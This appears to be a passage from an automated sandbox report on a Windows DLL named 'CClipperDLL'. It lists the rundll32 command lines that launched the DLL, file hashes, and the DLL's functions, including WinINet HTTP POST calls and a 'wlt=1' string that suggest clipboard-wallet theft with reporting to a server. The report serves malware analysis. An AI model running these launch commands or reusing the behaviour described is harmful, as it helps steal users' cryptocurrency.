Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:56:26
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:56:26
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Imagebase:	0x6d0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:56:26
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
Imagebase:	0x6d0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:56:29
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Imagebase:	0x6d0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:56:32
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main
Imagebase:	0x6d0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:56:35
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Imagebase:	0x6d0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:56:35
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Imagebase:	0x6d0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:56:35
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main
Imagebase:	0x6d0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	737
Total number of Limit Nodes:	22

Executed Functions

Function 6EC41EC0 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 409
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6EC41EC5

Part of subcall function 6EC46751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6EC4675D

InternetOpenW.WININET(6EC5BA54,00000000,00000000,00000000,00000000), ref: 6EC41FA7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6EC41FCE
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6EC41FF8
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6EC42031
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6EC4204B
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6EC4224B
InternetCloseHandle.WININET(00000000), ref: 6EC42266
InternetCloseHandle.WININET(?), ref: 6EC4226E
InternetCloseHandle.WININET(?), ref: 6EC42276

Strings

string too long, xrefs: 6EC41EC0
Content-Type: application/x-www-form-urlencoded, xrefs: 6EC41F71
POST, xrefs: 6EC41FF2

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: Content-Type: application/x-www-form-urlencoded$POST$string too long
API String ID: 4066372336-370044323
Opcode ID: 25d9d0c48b45032f944ff8b86c6e65ba089db4de5dd59c64b97e033e1e0ef60f
Instruction ID: 8e6a01cce139e7c5b948e87f11dc5fd641a194c328ce8c9900af40cf3c416f3b
Opcode Fuzzy Hash: 25d9d0c48b45032f944ff8b86c6e65ba089db4de5dd59c64b97e033e1e0ef60f
Instruction Fuzzy Hash: 2EF1D1B0A10118DBEB28CF68CC94BDDBBB5EF45304F5041D8E609AB285EB759AC4CF55

Function 6EC431B0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

abcdefghijklmnopqrstuvwxyz0123456789, xrefs: 6EC4357D
+++, xrefs: 6EC43B4B
wlt=1, xrefs: 6EC43ADA

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID:
String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
API String ID: 0-2251221455
Opcode ID: 49ca45bf4006efec9a4158992c9c6de02b64d795d7854926cedc2f8132c759a0
Instruction ID: af321846942a34ce4c6d597a0f9032c7e2c90a606371c1f229d61e5ae65ab3ae
Opcode Fuzzy Hash: 49ca45bf4006efec9a4158992c9c6de02b64d795d7854926cedc2f8132c759a0
Instruction Fuzzy Hash: 0DF11870A00209EFEB04CFA8CD58BDEBBF9EF85714F504619E811AB7C4EB7599448B91

Function 6EC41ED0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 386
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(6EC5BA54,00000000,00000000,00000000,00000000), ref: 6EC41FA7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6EC41FCE
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6EC41FF8
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6EC42031
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6EC4204B
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6EC4224B
InternetCloseHandle.WININET(00000000), ref: 6EC42266
InternetCloseHandle.WININET(?), ref: 6EC4226E
InternetCloseHandle.WININET(?), ref: 6EC42276

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 6EC41F71
POST, xrefs: 6EC41FF2

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: Content-Type: application/x-www-form-urlencoded$POST
API String ID: 1354133546-2387545335
Opcode ID: 48d43d6b6243534ab82c0b2b8e4bae4fcf9d3050903931e79897f679c43771e5
Instruction ID: 1ceac5d1180fe4c695fed5af1336b07ec2e119d232547e9a742721f15d5a9350
Opcode Fuzzy Hash: 48d43d6b6243534ab82c0b2b8e4bae4fcf9d3050903931e79897f679c43771e5
Instruction Fuzzy Hash: 32F1C0B0A10118DBEB28CF68CC94BDDBBB5EF45304F508198E609AB2C5EB759AC4CF55

Function 6EC46E7A Relevance: 10.6, APIs: 7, Instructions: 138
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6EC46EC1
___scrt_uninitialize_crt.LIBCMT ref: 6EC46EDB

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 45b7c64cf6189bed5a3bcf6e8d7db093ec0ca55fffd0a5e352f9260a7f4ad5b0
Instruction ID: e55e0c597803ef3bdd5a5365669e6bd8faaf51d2ac7c0c5fb51a103c5ddb6cdd
Opcode Fuzzy Hash: 45b7c64cf6189bed5a3bcf6e8d7db093ec0ca55fffd0a5e352f9260a7f4ad5b0
Instruction Fuzzy Hash: B541D672D11A59EFDB218FE5C940BDE3BBDEF40794F10491AE81567288F7314911AB90

Function 6EC46F2C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6EC46F69
dllmain_crt_dispatch.LIBCMT ref: 6EC46F80
dllmain_raw.LIBCMT ref: 6EC46FC8
dllmain_crt_dispatch.LIBCMT ref: 6EC46FDB
dllmain_raw.LIBCMT ref: 6EC46FEE

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: af50ba1ba51b35ae5b3e24cd0d7adbe9be3660e38bc4eb5650f1914461514b4f
Instruction ID: 893a6a2560e56d30f819eaa54589fc365d3a4a56798e8800333223f3e5d4cc48
Opcode Fuzzy Hash: af50ba1ba51b35ae5b3e24cd0d7adbe9be3660e38bc4eb5650f1914461514b4f
Instruction Fuzzy Hash: CF21D372D11A29EFDB228FD5CD40AAF3A7DEB80794F014415F8255B258E7318D01ABE0

Function 6EC4B423 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00000001,6EC4B68B,6EC4B935,?,?,6EC4AB0E), ref: 6EC4B428
_free.LIBCMT ref: 6EC4B485
_free.LIBCMT ref: 6EC4B4BB
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6EC4B68B,6EC4B935,?,?,6EC4AB0E), ref: 6EC4B4C6

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 98c756b04f72611f646ab79ae595e26da71943bcdfced596886a3db6a6ce183a
Instruction ID: 32cb4dea4d506634c71e23186dc0f06d602218b2ec7da37abe4b8d493ba5d45e
Opcode Fuzzy Hash: 98c756b04f72611f646ab79ae595e26da71943bcdfced596886a3db6a6ce183a
Instruction Fuzzy Hash: 2811E972614B08EEDB416EF94D80E5F2A7DABC2778B250E24F934A31C8FF218C215515

Function 6EC46D73 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6EC46DC0

Part of subcall function 6EC47490: InitializeSListHead.KERNEL32(6EC5F718,6EC46DCA,6EC5C7B0,00000010,6EC46D5B,?,?,?,6EC46F85,?,00000001,?,?,00000001,?,6EC5C7F8), ref: 6EC47495

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EC46E2A

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 158d22e35eda3ef6fa84b5d753465a22d627cbf95a91c8e5a223f2b6afe28323
Instruction ID: 1560327ef148be9cfa357d183e2c6352c48640189192ff5c2074e49693866022
Opcode Fuzzy Hash: 158d22e35eda3ef6fa84b5d753465a22d627cbf95a91c8e5a223f2b6afe28323
Instruction Fuzzy Hash: BF21D232564F55DEDB44ABF4D5107ED3BB5AF1236DF10085AD8806B3CAFB3240609AA6

Function 6EC4B8B2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EC4B46E,00000001,00000364,00000006,000000FF,?,00000001,6EC4B68B,6EC4B935,?,?,6EC4AB0E), ref: 6EC4B8F3

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b8d9722cfcf1f8b3121d5cc4475dc4d4e49bcb565ccec835417144f08e6f69d
Instruction ID: 737f94b0250ada6c2e13501ec998e335cabfb4f0a5948edfb4cedd1b6852a7cd
Opcode Fuzzy Hash: 1b8d9722cfcf1f8b3121d5cc4475dc4d4e49bcb565ccec835417144f08e6f69d
Instruction Fuzzy Hash: 1BF05431656B2ADBEB515FE78D14B9F776CAF82760B114521EC14EA19CFB30D40146A0

Non-executed Functions

Function 6EC47288 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EC47294
IsDebuggerPresent.KERNEL32 ref: 6EC47360
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EC47380
UnhandledExceptionFilter.KERNEL32(?), ref: 6EC4738A

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c9486506e4078b8fc07f31cd644a57c1e4228f99a60610e8eda76f102b06e557
Instruction ID: ced7bd275b9095005e594bb07d93993ab0474770744eabba89c9ed4ae5933a29
Opcode Fuzzy Hash: c9486506e4078b8fc07f31cd644a57c1e4228f99a60610e8eda76f102b06e557
Instruction Fuzzy Hash: 853127B5D15718DBDF50DFA4C9897CDBBB8AF08304F1045AAE80DAB280EB749A849F44

Function 6EC49820 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EC49918
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EC49922
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EC4992F

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 96cb3b677f81624134c03a6f547c9a7dfd4b983f4dcab571014f3d4a7f3266cb
Instruction ID: 5ab961b0527a078adaeb68d083bdd8baefe3ac582fe36f7918b554ebcab42e35
Opcode Fuzzy Hash: 96cb3b677f81624134c03a6f547c9a7dfd4b983f4dcab571014f3d4a7f3266cb
Instruction Fuzzy Hash: 4731D274911629DBCF61DF64C9887CDBBB8BF48310F5046EAE81CA7290EB349B858F44

Function 6EC4A254 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6EC4A253,?,00000001,?,?), ref: 6EC4A276
TerminateProcess.KERNEL32(00000000,?,6EC4A253,?,00000001,?,?), ref: 6EC4A27D
ExitProcess.KERNEL32 ref: 6EC4A28F

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 99b93354c4236ece675c3931e91bde6d6bd7eebe4552b5d9f5aac709665d2b04
Instruction ID: 9447dfc7912e39f4a156ebeeaf04b8a50017ddf508e879d6d260742bf40c1439
Opcode Fuzzy Hash: 99b93354c4236ece675c3931e91bde6d6bd7eebe4552b5d9f5aac709665d2b04
Instruction Fuzzy Hash: B9E0E631410A04EFCFA56F94C918A8D3B79FB85251B004524F41996535EB36D991EB94

Function 6EC51AB1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6EC51AAC,?,?,00000008,?,?,6EC51744,00000000), ref: 6EC51CDE

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5eadc1377c20f5f5bdc2d6af05729c48bdfae76039720befd8a45d3fe2347df5
Instruction ID: 73d698e9323002b47ceb8209607aa11d9b52691c3c5d6b45613a951555d9f642
Opcode Fuzzy Hash: 5eadc1377c20f5f5bdc2d6af05729c48bdfae76039720befd8a45d3fe2347df5
Instruction Fuzzy Hash: 55B16A31210A098FD745CF6CC49AB947BA0FF06364F258658E8E9CF3A5D336E9A5CB44

Function 6EC470A7 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6EC470BD

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5c52fef1228c1f96e71fc220224fdadc47d6e2c68c796266b906728db9f6a46c
Instruction ID: 677131a263793103067f0967117d260cc7ac7ef650333cdc69e0e8a02064e6f4
Opcode Fuzzy Hash: 5c52fef1228c1f96e71fc220224fdadc47d6e2c68c796266b906728db9f6a46c
Instruction Fuzzy Hash: 47515BB1A10B05CFDB15CF95C6917AABBF4FB88350F20846AE915FB284E3789950DF60

Function 6EC4BCEE Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9a615d5c3bff4c19847cadbf3afa3ecc3f52674ba7c10417206cb2c92ed9a2f
Instruction ID: a6a53727ed82ae1218981f7a8ae1a5707a9bfe037e613493a10495a721142963
Opcode Fuzzy Hash: b9a615d5c3bff4c19847cadbf3afa3ecc3f52674ba7c10417206cb2c92ed9a2f
Instruction Fuzzy Hash: 4141A475804619EEDB50DFA9CC88AEEBBBCEF45304F1442D9E41DE3208EA349E858F50

Function 6EC4D218 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6EC4D218

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d3164fb46e411923004990e7d84f65c4d47f05158edc80640c06db0732da19b9
Instruction ID: dadcf87e9dcc16d62c6568789197c890582e2d911c3beff18437f7eacc6f581c
Opcode Fuzzy Hash: d3164fb46e411923004990e7d84f65c4d47f05158edc80640c06db0732da19b9
Instruction Fuzzy Hash: 8AA01130200A00CF8F008E30832820A3BB8BA8A2E23008028E000E2000EB208020AA00

Function 6EC4B881 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
Instruction ID: aacb5aad0d124d97d0a4cbcbfc154ef0c43dec84aaa5b286e144ef297b4579c5
Opcode Fuzzy Hash: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
Instruction Fuzzy Hash: 24E08C32A11328EBCB10CBD8C940E8EB3ECEB48B10B114496F911D3214E274DE00C7E0

